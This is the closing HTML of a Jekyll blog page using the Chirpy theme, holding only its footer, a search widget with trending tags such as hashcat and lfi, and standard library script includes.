          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        

        

        Powered by 
          <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
         with 
          <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a>
         theme.

      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/hashcat/">hashcat</a>
    
      
      <a class="post-tag" href="/tags/john/">john</a>
    
      
      <a class="post-tag" href="/tags/lfi/">lfi</a>
    
      
      <a class="post-tag" href="/tags/tar/">tar</a>
    

    </div>
  </div>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup & clipboard -->
  

  







  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script>







  

  

  







  
    

    

  



  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script>








<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script>




  </body>

</html>

